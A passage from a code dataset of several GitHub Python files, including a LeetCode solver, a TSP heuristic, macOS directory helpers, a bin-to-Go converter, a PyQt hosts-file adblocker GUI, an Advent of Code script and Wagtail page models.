== target or curIndex = len(candidates)\n if total == target:\n result.append(curCandidates)\n return\n elif curIndex == len(candidates):\n return\n elif total > target:\n return\n\n # 两个可能 选择当前index数值并加入至curCandidates内 or index+1\n # 两个可能 选择当前index数值并加入至curCandidates内 or index+1\n combinationSumDFS(candidates, curIndex, curCandidates+[candidates[curIndex]], target)\n combinationSumDFS(candidates, curIndex + 1,curCandidates[:], target)\n\n combinationSumDFS(candidates, 0, [], target)\n return result\n","repo_name":"CivilAisys/LeetCode","sub_path":"39.CombinationSum/39_CombinationSum.py","file_name":"39_CombinationSum.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21244900364","text":"import math\nimport glob\nimport random\nimport copy\n\n\ndef read_input_csv(file_name):\n cities = []\n with open(file_name, 'r') as f:\n for i, line in enumerate(f):\n if i == 0:\n continue\n x, y = line.strip().split(',')\n cities.append({'x': float(x), 'y': float(y), 'index': i - 1})\n return cities\n\n\ndef write_output_csv(file_name, cities):\n with open(file_name, 'w') as f:\n f.write('index\\n')\n for city in cities:\n f.write('{}\\n'.format(city['index']))\n\n\ndef calc_distance(city1, city2):\n return math.sqrt((city1['x'] - city2['x']) ** 2 + (city1['y'] - city2['y']) ** 2)\n\n\ndef calc_total_distance(cities):\n total_distance = 0\n for i in range(len(cities)):\n city1 = cities[i]\n city2 = cities[(i + 1) % len(cities)]\n total_distance += calc_distance(city1, city2)\n return total_distance\n\n\ndef main():\n input_files = glob.glob('./google-step-tsp/input_[0-6].csv')\n # input_files = glob.glob('./google-step-tsp/input_3.csv')\n alpha = 0.85\n # input_files = input_files[5:]\n for input_file in input_files:\n cities = read_input_csv(input_file)\n\n best_total_distance = calc_total_distance(cities)\n best_cities = copy.deepcopy(cities)\n cities_count = len(cities)\n\n for _ in range (30):\n # 初期解の生成\n # 貪欲法\n current_city = random.choice(cities)\n unvisited_cities = copy.deepcopy(cities)\n unvisited_cities.remove(current_city)\n visited_cities = [current_city]\n while len(unvisited_cities) > 0:\n next_city = min(unvisited_cities, key=lambda city: calc_distance(\n current_city, city))\n unvisited_cities.remove(next_city)\n visited_cities.append(next_city)\n current_city = next_city\n\n total_distance = calc_total_distance(visited_cities)\n assert cities_count == len(visited_cities)\n\n for k in range(min(cities_count * 1000, 100000)):\n # ランダムに2つ選んで入れ替える->スコアがよくなるなら採用/スコアが良くならない場合でも確率的に採用\n i = random.randint(0, cities_count - 1)\n j = random.randint(0, cities_count - 1)\n if i == j:\n continue\n else:\n visited_cities[i], visited_cities[j] = visited_cities[j], visited_cities[i]\n new_total_distance = calc_total_distance(visited_cities)\n if new_total_distance < total_distance:\n total_distance = new_total_distance\n elif random.random() < alpha**((new_total_distance - total_distance)):\n total_distance = new_total_distance\n # print('accept')\n else:\n visited_cities[i], visited_cities[j] = visited_cities[j], visited_cities[i]\n # print('reject')\n \n if k % 10000 == 0:\n print(k, total_distance)\n\n if total_distance < best_total_distance:\n best_total_distance = total_distance\n best_cities = copy.deepcopy(visited_cities)\n\n assert cities_count == len(best_cities)\n\n write_output_csv('./google-step-tsp/output_' +\n input_file[len('./google-step-tsp/input_'):], best_cities)\n print(input_file, best_total_distance)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"syobonpastel/step2023_homework","sub_path":"week5/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38797766379","text":"\n\"\"\"Utilities for finding standard Mac directories.\n\nHistory:\n2004-02-04 ROwen\n2004-02-12 ROwen Modified to use fsref.as_pathname() instead of Carbon.File.pathname(fsref).\n2005-07-11 ROwen Modified getAppSuppDirs to return None for nonexistent directories.\n Removed doCreate argument from getAppSuppDirs, getDocsDir and getPrefsDir.\n Added getDocsDir.\n2005-09-27 ROwen Changed getPrefsDir to getPrefsDirs.\n Added getAppDirs.\n Refactored to use getMacUserDir and getMacUserSharedDirs.\n2005-10-05 ROwen Added inclNone argument to getXXXDirs functions.\n Modified getStandardDir to return None if dirType is None.\n Added getAppDirs and getPrefsDirs to the test code.\n Removed obsolete getPrefsDir.\n2015-09-24 ROwen Replace \"== None\" with \"is None\" to modernize the code.\n2015-11-03 ROwen Replace \"!= None\" with \"is not None\" to modernize the code.\n2022-11-09 GMacD Now using pyObjC framework with Python 3.x.\n\"\"\"\nfrom Foundation import *\n\n\ndef getAppDirs(inclNone = False):\n \"\"\"Return up to two paths: user's private and shared application directory.\n\n Inputs:\n - inclNone if True, paths to missing folders are set to None;\n if False (the default) paths to missing folders are omitted\n \"\"\"\n userPrivateAppDirs = NSSearchPathForDirectoriesInDomains(\n NSApplicationDirectory,\n NSUserDomainMask,\n True\n )\n userLocalAppDirs = NSSearchPathForDirectoriesInDomains(\n NSApplicationDirectory,\n NSLocalDomainMask,\n True\n )\n return [*userPrivateAppDirs, *userLocalAppDirs]\n\ndef getAppSuppDirs(inclNone = False):\n \"\"\"Return up to two paths: the user's private and shared application support directory.\n \n Inputs:\n - inclNone if True, paths to missing folders are set to None;\n if False (the default) paths to missing folders are omitted\n \"\"\"\n userPrivateSuppDirs = NSSearchPathForDirectoriesInDomains(\n NSApplicationSupportDirectory,\n NSUserDomainMask,\n True\n )\n userLocalSuppDirs = NSSearchPathForDirectoriesInDomains(\n NSApplicationSupportDirectory,\n NSLocalDomainMask,\n True\n )\n return [*userPrivateSuppDirs, *userLocalSuppDirs] \n\ndef getDocsDir():\n \"\"\"Return the path to the user's documents directory.\n \n Return None if the directory does not exist.\n \"\"\"\n userDocumentDir = NSSearchPathForDirectoriesInDomains(\n NSDocumentDirectory,\n NSUserDomainMask,\n True\n )\n return userDocumentDir[-1]\n\ndef getPrefsDirs(inclNone = False):\n \"\"\"Return up to two paths: the user's local and shared preferences directory.\n \n Inputs:\n - inclNone if True, paths to missing folders are set to None;\n if False (the default) paths to missing folders are omitted\n \"\"\"\n userPrivatePrefPanesDir = NSSearchPathForDirectoriesInDomains(\n NSPreferencePanesDirectory,\n NSUserDomainMask,\n True\n )\n userLocalPrefPanesDir = NSSearchPathForDirectoriesInDomains(\n NSPreferencePanesDirectory,\n NSLocalDomainMask,\n True\n )\n return [*userPrivatePrefPanesDir, *userLocalPrefPanesDir]\n\ndef getHomeDir():\n \"\"\"\n Return user's home directory location.\n \"\"\"\n return NSHomeDirectory()\n\ndef getPrefsPrefix():\n \"\"\"\n Return the preferences prefix for the preferences file,\n and empty string for Maci i.e. no prefix.\n \"\"\"\n return ''\n","repo_name":"ApachePointObservatory/TUI3","sub_path":"RO/OS/getMacDirs.py","file_name":"getMacDirs.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"24864814535","text":"import argparse\nimport sys\n\n# parse args\n########################################\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-w\", \"--width\", type=int, default=120, help=\"sets maximum width in characters of output Go bytes array\")\nparser.add_argument(\"infile\", help=\"file to convert into a Go bytes array\")\nargs = parser.parse_args()\n\n# read file\n########################################\n\nbyte_list = []\n\nwith open(args.infile, \"rb\") as f:\n byte = f.read(1)\n while byte:\n byte_as_int = int.from_bytes(byte, byteorder=sys.byteorder)\n byte_list.append(byte_as_int)\n byte = f.read(1)\n\n# print byte array\n########################################\n\nprint(\"var myBytesArray []byte = []byte{\")\nline = \" {}, \".format(byte_list[0])\n\nfor b in byte_list[1:]:\n\n if len(\"{}{},\".format(line, b)) > args.width:\n print(line)\n line = \" {}, \".format(b)\n else:\n line += \"{}, \".format(b)\n\nprint(line)\nprint(\"}\")\n","repo_name":"davgra04/bin2go","sub_path":"bin2go.py","file_name":"bin2go.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73353003366","text":"'''\r\nCopyright (C) 2021 xploreinfinity\r\n\r\nThis program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, version 3.\r\n\r\nThis program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.\r\n\r\nYou should have received a copy of the GNU General Public License along with this program. If not, see .\r\n'''\r\n\r\nfrom PyQt6 import QtWidgets,QtCore,QtGui,uic\r\nimport sys,os,inspect\r\nfrom swift_block import Parser\r\n#from swift_block import elevate\r\nfrom swift_block import RuleManager\r\nclass Ui(QtWidgets.QWidget):\r\n def __init__(self):\r\n super().__init__()\r\n #*load the ui file\r\n self.scriptPath=os.path.abspath(os.path.dirname(inspect.getsourcefile(lambda:0))).replace('\\\\','/')\r\n uic.loadUi(self.scriptPath+\"/ui/adblock.ui\",self)\r\n #*init the library for interacting with host sources,etc...\r\n #!WARNING:This changes the current directory\r\n self.parser=Parser.Parser()\r\n\r\n #*GLOBAL VARIABLES DECLARATION:\r\n self.status=False #*Flag which indicates whether swiftblock is enabled or disabled\r\n self.editMode=True #*controls whether the source editing form is set to edit source mode or add source mode\r\n self.selectedSource=''#*Will store QListWidgetItem that is currently selected by the user\r\n self.sourceDct={}#*Stores source names and corresponding source URLs for display in the source edit form when user clicks on a source\r\n\r\n self.SignalSlotConfig()\r\n self.show()\r\n self.reconf_ui()\r\n\r\n def reconf_ui(self):\r\n self.setWindowIcon(QtGui.QIcon(self.scriptPath+\"/assets/app_icon.svg\"))\r\n #*Reconfig for the status tab:\r\n self.loadStatus()\r\n self.manageRules_btn.setIcon(QtGui.QIcon(self.scriptPath+\"/assets/ruleMan.svg\"))\r\n self.manageRules_btn.setIconSize(QtCore.QSize(30,30))\r\n self.updateSources_btn.setIcon(QtGui.QIcon(self.scriptPath+\"/assets/sources_update.png\"))\r\n self.updateSources_btn.setIconSize(QtCore.QSize(35,35))\r\n #*Reconfig for the sources tab:\r\n self.loadSrcData()\r\n self.sourcesForm_widget.setDisabled(True)\r\n self.sourceDelete_btn.setDisabled(True)\r\n self.editMode_lbl.hide()\r\n self.formStatus_lbl.hide()\r\n self.sourceName_tf.setPlaceholderText(\"Unqiue nickname for the source\")\r\n self.sourceURL_tf.setPlaceholderText(\"Unique URL of the source\")\r\n #*Reconfig for the about tab:\r\n self.gitRepo_btn.setIcon(QtGui.QIcon(self.scriptPath+'/assets/github.svg'))\r\n self.gitRepo_btn.setIconSize(QtCore.QSize(35,50))\r\n self.license_btn.setIcon(QtGui.QIcon(self.scriptPath+'/assets/license.png'))\r\n self.license_btn.setIconSize(QtCore.QSize(30,30))\r\n self.uninstall_btn.setIcon(QtGui.QIcon(self.scriptPath+'/assets/uninstall.png'))\r\n self.uninstall_btn.setIconSize(QtCore.QSize(30,30))\r\n self.appIcon_lbl.setStyleSheet(\"border-image:url(\"+self.scriptPath+\"/assets/app_icon.svg);\")\r\n\r\n #*Several utility functions that prevent code repetition:\r\n #*Shows an error MessageBox which informs the user of the error(and provides additional info):\r\n def err_msg(self,err):\r\n msg=QtWidgets.QMessageBox()\r\n msg.setWindowTitle(\"Error\")\r\n msg.setIcon(QtWidgets.QMessageBox.Icon.Critical)\r\n msg.setStandardButtons(QtWidgets.QMessageBox.StandardButton.Ok)\r\n msg.setText(\"Oops! An error occurred. Additional info is provided below\")\r\n msg.setDetailedText(str(err))\r\n msg.exec()\r\n\r\n #*Displays a success/error message on the label passed as an argument:\r\n def showStatus_lbl(self,message,lbl,success=False):\r\n if success:\r\n lbl.setStyleSheet(\"color:black;background-color:limegreen;font-weight:bold\")\r\n else:\r\n lbl.setStyleSheet(\"color:white;background-color:crimson;font-weight:bold\")\r\n lbl.setText(message)\r\n lbl.show()\r\n\r\n #*load the status of the adblocker(whether active,no. of hosts blocked/redirected/allowed):\r\n def loadStatus(self):\r\n blocked,redirected,allowed,self.status=self.parser.getStatus()\r\n if blocked !=None and redirected!=None and allowed !=None:\r\n self.blockedCount_lbl.setText(str(blocked))\r\n self.redirectedCount_lbl.setText(str(redirected))\r\n self.allowedCount_lbl.setText(str(allowed))\r\n #*Based on swiftblock's status,change the gui accordingly:\r\n if self.status:\r\n self.status_lbl.setText(\"SwiftBlock is enabled\")\r\n self.toggleStatus_btn.setText(\"Disable\")\r\n self.background_lbl.setStyleSheet(\"background-image:url('\"+self.scriptPath+\"/assets/martini.png');\")\r\n self.statusShield_lbl.setStyleSheet(\"border-image:url('\"+self.scriptPath+\"/assets/active_shield.svg');\")\r\n else:\r\n self.status_lbl.setText(\"SwiftBlock is disabled\")\r\n self.toggleStatus_btn.setText(\"Enable\")\r\n self.background_lbl.setStyleSheet(\"background-image:url('\"+self.scriptPath+\"/assets/autumn.png');\")\r\n self.statusShield_lbl.setStyleSheet(\"border-image:url('\"+self.scriptPath+\"/assets/inactive_shield.svg');\")\r\n\r\n\r\n #*fetches and shows user's host sources on the sourcesList:\r\n def loadSrcData(self):\r\n self.sourcesList.clear()\r\n self.selectedSource=None\r\n sources=self.parser.fetch_sources()\r\n self.sourceDct={}\r\n for source in sources:\r\n self.sourcesList.addItem(source[0])\r\n self.sourceDct[source[0]]=source[1]\r\n #*Reset the form and disable said form and the delete btn:\r\n self.sourceName_tf.setText('')\r\n self.sourceURL_tf.setText('')\r\n self.sourcesForm_widget.setDisabled(True)\r\n self.sourceDelete_btn.setDisabled(True)\r\n\r\n #*A vital function that assigns all widgets handlers(slots) for specific events(signals):\r\n def SignalSlotConfig(self):\r\n #*for events occurring in status tab:\r\n self.toggleStatus_btn.clicked.connect(self.toggleStatusClicked)\r\n self.manageRules_btn.clicked.connect(self.openRuleManager)\r\n self.updateSources_btn.clicked.connect(self.updateSourcesClicked)\r\n #*for events occurring in sources tab:\r\n self.sourcesList.selectionModel().currentChanged.connect(self.sourceSelected)\r\n self.sourceAdd_btn.clicked.connect(self.addBtnClicked)\r\n self.sourceDelete_btn.clicked.connect(self.deleteBtnClicked)\r\n self.sourceSave_btn.clicked.connect(self.sourceSaveBtnClicked)\r\n #*for events occurring in the about tab:\r\n self.gitRepo_btn.clicked.connect(self.gitRepo_btnClicked)\r\n self.license_btn.clicked.connect(self.license_btnClicked)\r\n self.uninstall_btn.clicked.connect(self.uninstall_btnClicked)\r\n\r\n #*SLOTS FOR EACH SIGNAL BELOW:\r\n #*slots for status tab:\r\n #*Enables or disables swiftblock:\r\n def toggleStatusClicked(self):\r\n #*If swiftblock is enabled, disable it:\r\n if self.status:\r\n self.status=False\r\n self.parser.write_changes(purge=True)\r\n #*Reload the status to reflect the change in the GUI:\r\n self.loadStatus()\r\n #*If swiftblock is disabled, enable it:\r\n else:\r\n self.status=False\r\n self.parser.write_changes()\r\n #*Reload the status to reflect the change in the GUI:\r\n self.loadStatus()\r\n\r\n #*Opens the rule manager window:\r\n def openRuleManager(self):\r\n self.rm=RuleManager.RuleManager(self.scriptPath)\r\n self.close()\r\n\r\n\r\n #*Updates the sources(fetches them fro their origin) and then regenerates hosts file:\r\n def updateSourcesClicked(self):\r\n try:\r\n self.parser.generateSourceRules(updateSources=True)\r\n self.parser.regen_hosts()\r\n self.loadStatus()#*Refresh the blocked/redirected/allowed counts after the update\r\n #*Inform the user that the update succeeded:\r\n msg=QtWidgets.QMessageBox()\r\n msg.setStandardButtons(QtWidgets.QMessageBox.StandardButton.Ok)\r\n msg.setWindowTitle(\"Success\")\r\n msg.setText(\"Sources updated successfully and changes applied!\")\r\n msg.setIcon(QtWidgets.QMessageBox.Icon.Information)\r\n msg.exec()\r\n except Exception as err:\r\n self.err_msg(err)\r\n\r\n #*slots for the sources tab:\r\n def sourceSelected(self,current):\r\n #*Make sure the list isnt empty(which makes selected item None type)\r\n if self.sourcesList.currentItem():\r\n item=self.sourcesList.currentItem().text()\r\n #*update the value of the selectedSource global var:\r\n self.selectedSource=item\r\n self.sourceName_tf.setText(item)\r\n self.sourceURL_tf.setText(self.sourceDct[item])\r\n #*Activate the form and show the user that they're now editing a source:\r\n self.sourcesForm_widget.setDisabled(False)\r\n self.editMode=True\r\n self.editMode_lbl.setText(\"Editing an existing source:\")\r\n self.editMode_lbl.show()\r\n #*also hide previous status messages and enable the delete btn:\r\n self.formStatus_lbl.hide()\r\n self.sourceDelete_btn.setDisabled(False)\r\n\r\n def addBtnClicked(self):\r\n #*Clear(and enable if disabled) the form and change the editMode to add mode:\r\n self.sourcesForm_widget.setDisabled(False)\r\n self.editMode_lbl.show()\r\n self.sourceName_tf.setText('')\r\n self.sourceURL_tf.setText('')\r\n self.editMode=False\r\n self.editMode_lbl.setText(\"Adding a new source:\")\r\n #*Also hide any previous messages:\r\n self.formStatus_lbl.hide()\r\n\r\n def deleteBtnClicked(self):\r\n #*ensure that a source from the list is selected,warn the user otherwise:\r\n if not self.selectedSource:\r\n self.showStatus_lbl(\"Select a source from the list first!\",self.formStatus_lbl)\r\n else:\r\n #*Ask the user if they really want to delete the source\r\n question=QtWidgets.QMessageBox(QtWidgets.QMessageBox.Icon.Question,\"Please Confirm\",\"Are you sure you want to delete this source?\",(QtWidgets.QMessageBox.StandardButton.Yes|QtWidgets.QMessageBox.StandardButton.No))\r\n confirm=question.exec()\r\n if confirm==QtWidgets.QMessageBox.StandardButton.Yes:\r\n self.sourceDelete_btn.setDisabled(True)\r\n try:\r\n self.parser.del_source(self.selectedSource)\r\n self.loadSrcData()\r\n self.showStatus_lbl(\"Deleted source successfully!\",self.formStatus_lbl,True)\r\n except Exception as err:\r\n self.err_msg(err)\r\n self.showStatus_lbl(\"Oops! An error occurred\",self.formStatus_lbl)\r\n self.sourceDelete_btn.setDisabled(True)\r\n\r\n def sourceSaveBtnClicked(self):\r\n srcName=self.sourceName_tf.text()\r\n srcURL=self.sourceURL_tf.text()\r\n if(srcName==\"\" or srcURL==\"\"):\r\n self.formStatus_lbl.setStyleSheet(\"color:white;background-color:crimson;font-weight:bold\")\r\n self.formStatus_lbl.setText(\"Fields can't be empty!\")\r\n self.formStatus_lbl.show()\r\n #*ensure that a source from the list is selected,warn the user otherwise:\r\n elif not self.selectedSource and self.editMode:\r\n self.showStatus_lbl(\"Select a source from the list first!\",self.formStatus_lbl)\r\n else:\r\n #*Save button disabled to prevent multiple save attempts at once\r\n self.sourceSave_btn.setDisabled(True)\r\n #*Check the mode[editMode when True is to edit an existing source and to add a new source when False]\r\n if self.editMode:\r\n try:\r\n self.parser.edit_source(self.selectedSource,srcName,self.sourceDct[self.selectedSource],srcURL)\r\n self.loadSrcData()\r\n self.showStatus_lbl(\"Edited source successfully!\",self.formStatus_lbl,True)\r\n except Exception as err:\r\n self.err_msg(err)\r\n self.showStatus_lbl(\"Oops! An error occurred\",self.formStatus_lbl)\r\n #*calling this here incase the editing of the source succeeded but something else failed:(which would effectively make existing sourceList entries old and obsolete)\r\n self.loadSrcData()\r\n\r\n\r\n else:\r\n try:\r\n self.parser.add_source(srcName,srcURL)\r\n self.loadSrcData()\r\n self.showStatus_lbl(\"Added source successfully!\",self.formStatus_lbl,True)\r\n except Exception as err:\r\n self.err_msg(err)\r\n self.showStatus_lbl(\"Oops! An error occurred\",self.formStatus_lbl)\r\n #*calling this here incase the adding of the source succeeded but something else failed:(which would effectively make existing sourceList entries old and obsolete)\r\n self.loadSrcData()\r\n\r\n #*re-enable the save btn\r\n self.sourceSave_btn.setDisabled(False)\r\n\r\n #*Slots for the about tab:\r\n def gitRepo_btnClicked(self):\r\n import webbrowser\r\n if sys.platform.startswith('win32'):\r\n webbrowser.open(\"https://github.com/XploreInfinity/swift-block\")\r\n else:\r\n self.err_msg(\"To see the Git Repo,visit 'https://github.com/XploreInfinity/swift-block' in your web-browser.\\n\\nSince swiftblock runs as root/administrator user,we can't(safely)open it for you\")\r\n\r\n def license_btnClicked(self):\r\n import webbrowser\r\n if sys.platform.startswith('win32'):\r\n webbrowser.open(\"https://github.com/XploreInfinity/swift-block/blob/main/LICENSE\")\r\n else:\r\n self.err_msg(\"To see the license,visit 'https://github.com/XploreInfinity/swift-block/blob/main/LICENSE' in your web-browser.\\n\\nSince swiftblock runs as root/administrator user,we can't(safely)open it for you\")\r\n\r\n def uninstall_btnClicked(self):\r\n #*Ask the user if they really want to uninstall swift-block:\r\n question=QtWidgets.QMessageBox(QtWidgets.QMessageBox.Icon.Question,\"Please Confirm\",\"Swift Block will be removed along with its menu launcher. Are you sure you want to continue?\",(QtWidgets.QMessageBox.StandardButton.Yes|QtWidgets.QMessageBox.StandardButton.No))\r\n confirm=question.exec()\r\n if confirm==QtWidgets.QMessageBox.StandardButton.Yes:\r\n try:\r\n #*Call the uninstaller:\r\n self.parser.uninstall()\r\n except Exception as err:\r\n #*Unfortunately, windows doesnt allow running programs to be deleted. So uninstalling swiftblock from within swiftblock will certainly fail\r\n #*Pip will uninstall the package,but some .exe files will persist in the %TEMP% directory. This is a trivial faliure and not worth asking\r\n #*the user to manually uninstall swiftblock from cmd. Exit swiftblock and call it a day:\r\n if sys.platform.startswith('win32'):\r\n print(err)\r\n exit()\r\n self.err_msg(str(err)+'\\nTry uninstalling swift-block using pip from your terminal/cmd')\r\n","repo_name":"XploreInfinity/swift-block","sub_path":"swift_block/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10633541614","text":"'''\n--- Part Two ---\nYou're worried you might not ever get your items back. So worried, in fact, that your relief that a monkey's inspection didn't damage an item no longer causes your worry level to be divided by three.\n\nUnfortunately, that relief was all that was keeping your worry levels from reaching ridiculous levels. You'll need to find another way to keep your worry levels manageable.\n\nAt this rate, you might be putting up with these monkeys for a very long time - possibly 10000 rounds!\n\nWith these new rules, you can still figure out the monkey business after 10000 rounds. Using the same example above:\n\n== After round 1 ==\nMonkey 0 inspected items 2 times.\nMonkey 1 inspected items 4 times.\nMonkey 2 inspected items 3 times.\nMonkey 3 inspected items 6 times.\n\n== After round 20 ==\nMonkey 0 inspected items 99 times.\nMonkey 1 inspected items 97 times.\nMonkey 2 inspected items 8 times.\nMonkey 3 inspected items 103 times.\n\n== After round 1000 ==\nMonkey 0 inspected items 5204 times.\nMonkey 1 inspected items 4792 times.\nMonkey 2 inspected items 199 times.\nMonkey 3 inspected items 5192 times.\n\n== After round 2000 ==\nMonkey 0 inspected items 10419 times.\nMonkey 1 inspected items 9577 times.\nMonkey 2 inspected items 392 times.\nMonkey 3 inspected items 10391 times.\n\n== After round 3000 ==\nMonkey 0 inspected items 15638 times.\nMonkey 1 inspected items 14358 times.\nMonkey 2 inspected items 587 times.\nMonkey 3 inspected items 15593 times.\n\n== After round 4000 ==\nMonkey 0 inspected items 20858 times.\nMonkey 1 inspected items 19138 times.\nMonkey 2 inspected items 780 times.\nMonkey 3 inspected items 20797 times.\n\n== After round 5000 ==\nMonkey 0 inspected items 26075 times.\nMonkey 1 inspected items 23921 times.\nMonkey 2 inspected items 974 times.\nMonkey 3 inspected items 26000 times.\n\n== After round 6000 ==\nMonkey 0 inspected items 31294 times.\nMonkey 1 inspected items 28702 times.\nMonkey 2 inspected items 1165 times.\nMonkey 3 inspected items 31204 times.\n\n== After round 7000 ==\nMonkey 0 inspected items 36508 times.\nMonkey 1 inspected items 33488 times.\nMonkey 2 inspected items 1360 times.\nMonkey 3 inspected items 36400 times.\n\n== After round 8000 ==\nMonkey 0 inspected items 41728 times.\nMonkey 1 inspected items 38268 times.\nMonkey 2 inspected items 1553 times.\nMonkey 3 inspected items 41606 times.\n\n== After round 9000 ==\nMonkey 0 inspected items 46945 times.\nMonkey 1 inspected items 43051 times.\nMonkey 2 inspected items 1746 times.\nMonkey 3 inspected items 46807 times.\n\n== After round 10000 ==\nMonkey 0 inspected items 52166 times.\nMonkey 1 inspected items 47830 times.\nMonkey 2 inspected items 1938 times.\nMonkey 3 inspected items 52013 times.\nAfter 10000 rounds, the two most active monkeys inspected items 52166 and 52013 times. Multiplying these together, the level of monkey business in this situation is now 2713310158.\n\nWorry levels are no longer divided by three after each item is inspected; you'll need to find another way to keep your worry levels manageable. Starting again from the initial state in your puzzle input, what is the level of monkey business after 10000 rounds?\n'''\n\nimport re\ntry:\n from tqdm import tqdm\nexcept ImportError:\n from pip._internal import main as pip\n pip(['install', '--user', 'tqdm'])\n from tqdm import tqdm\n\n\nclass badMonkey():\n\n\tdef __init__(self,number:int, bag:list,operation:tuple, test:int, target:tuple):\n\t\tprint(f\"Creating monkey {number}...\")\n\t\tself.number = number\n\t\tself.bag = bag\n\t\tself.itemsInspected = 0\n\t\tself.operation = operation\n\t\tself.test = test\n\t\tself.target = target\n \n\n\tdef getInfo(self):\n\t\tprint(f\"Monkey {self.number} info:\")\n\t\tprint(f\"Bag: {self.bag}\")\n\t\tprint(f\"Items Inspected: {self.itemsInspected}\")\n\t\treturn ''\n\n\tdef inspectBag(self, verbose:bool = False):\n\t\t'''\n\t\tReturns a json of Target and item\n\t\t'''\n\t\tif verbose:\n\t\t\tprint(f\"Monkey {self.number} is Inspecting Items in Bag...\")\n\t\treturnBag = []\n\t\twhile self.bag:\n\t\t\tself.itemsInspected += 1\n\t\t\titem = self.bag.pop(0)\n\n\t\t\titem = self.newOperation(item)//3\n\t\t\t# print(self.operation)\n\t\t\treturnBag.append({\"Target\": self.findTarget(item),\n\t\t\t\"Concern\": item})\n\t\treturn returnBag\n\n\tdef findTarget(self,concern:int):\n\t\t# if not 0, return the true value for target\n\t\tif not concern % self.test:\n\t\t\treturn self.target[0]\n\t\treturn self.target[1]\n\n\tdef newOperation(self, concern:int):\n\t\tif self.operation[0] == '+':\n\t\t\tconcern += self.operation[1]\n\t\tif self.operation[0] == '-':\n\t\t\tconcern -= self.operation[1]\n\t\tif self.operation[0] == '*':\n\t\t\tconcern *= self.operation[1]\n\t\tif self.operation[0] == '/':\n\t\t\tconcern /= self.operation[1]\n\t\tif self.operation[0] == '**':\n\t\t\tconcern *= concern\n\t\treturn concern\n\t\n\tdef catchItem(self, concern:int):\n\t\tself.bag.append(concern)\n\n\tdef itemsInspected(self):\n\t\treturn self.itemsInspected\n\n\ndef getNumbers(text:str):\n\n\treturn re.findall('[0-9]+', text)\n\ndef processMonkey(monkey:list):\n\tmonkeyNumber = int(getNumbers(monkey[0])[0])\n\t\n\t#create monkey bag\n\tbag = []\n\tconcern = getNumbers(monkey[1])\n\tfor num in concern:\n\t\tbag.append(int(num))\n\n\n\tif getNumbers(monkey[2]):\n\t\toperation = re.search('[-+\\\\*]+', monkey[2])[0]\n\t\toperationMod = int(getNumbers(monkey[2])[0])\n\telse:\n\t\toperation = '**'\n\t\toperationMod = '0'\n\n\ttest = int(getNumbers(monkey[3])[0])\n\ttarget = (int(getNumbers(monkey[4])[0]),int(getNumbers(monkey[5])[0]))\n\n\t# print(monkeyNumber, bag, operation, operationMod, test, TF)\n\treturn badMonkey(monkeyNumber, bag, (operation, operationMod), test, target)\n\n\n\nwith open(\"./input.txt\", \"r\") as f:\n inputFile = [monkey.split('\\n') for monkey in f.read().split('\\n\\n')]\n\nmonkeys = []\n\nfor item in inputFile:\n\tmonkeys.append(processMonkey(item))\n\n\nfor monkey in monkeys:\n\tprint(monkey.getInfo())\n\n# print(monkeys[0].inspectBag())\n\nfor count in tqdm(range(10000)):\n\tfor monkey in monkeys:\n\t\titems = monkey.inspectBag()\n\t\tfor item in items:\n\t\t\tmonkeys[item['Target']].catchItem(item['Concern'])\n\ncount = []\nfor monkey in monkeys:\n\tcount.append(monkey.itemsInspected)\ncount = sorted(count)\nprint(count[-1]*count[-2])","repo_name":"pangjeffa/advantcode2022","sub_path":"day11/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":6033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20925861075","text":"\"\"\"Our team page\"\"\"\n\nfrom django.db import models\nfrom django import forms\n\n# django contact form\n#from django.shortcuts import render\n#from django.views.generic import View\n#from django.http import HttpResponse # Add this\n#from .forms import ContactForm\n\nfrom wagtail.core.models import Page, Orderable\nfrom wagtail.admin.edit_handlers import FieldPanel\n\nfrom wagtail.core.fields import RichTextField\nfrom wagtail.search import index\n\nfrom modelcluster.fields import ParentalKey, ParentalManyToManyField\nfrom wagtail.core.fields import StreamField\nfrom wagtail.admin.edit_handlers import (\n StreamFieldPanel, \n FieldPanel, \n InlinePanel, \n FieldRowPanel,\n MultiFieldPanel\n)\nfrom wagtail.images.edit_handlers import ImageChooserPanel\nfrom wagtail.snippets.edit_handlers import SnippetChooserPanel\nfrom wagtail.snippets.models import register_snippet\nfrom streams import blocks\nfrom django.utils.text import slugify\n\nfrom wagtail.core.fields import RichTextField\nfrom wagtail.contrib.forms.models import (\n AbstractEmailForm,\n AbstractFormField\n)\nfrom django.shortcuts import redirect\nfrom django.forms import widgets\n\nclass GuideQualification(models.Model):\n \"\"\"Guide qualification for a snippet\"\"\"\n\n qualification = models.CharField(max_length=127)\n slug = models.SlugField(\n verbose_name=\"slug\",\n allow_unicode=True,\n max_length=127,\n help_text='A slug to identify guides by this qualification',\n )\n\n panels = [\n FieldPanel(\"qualification\"),\n FieldPanel(\"slug\"),\n ]\n\n class Meta:\n verbose_name = \"Guide Qualification\"\n verbose_name_plural = \"Guide Qualifications\"\n ordering = [\"qualification\"]\n\n def __str__(self):\n return self.qualification\n\nregister_snippet(GuideQualification)\n\nclass GuideToursOrderable(Orderable):\n page = ParentalKey(\"ourteam.TourGuidePage\", related_name=\"guide_tours\")\n # Note: tours pages for each guide\n tours_pages = models.ForeignKey(\n \"tours.TourPage\",\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name=\"+\"\n )\n\n def __str__(self):\n return self.page.title\n\nclass 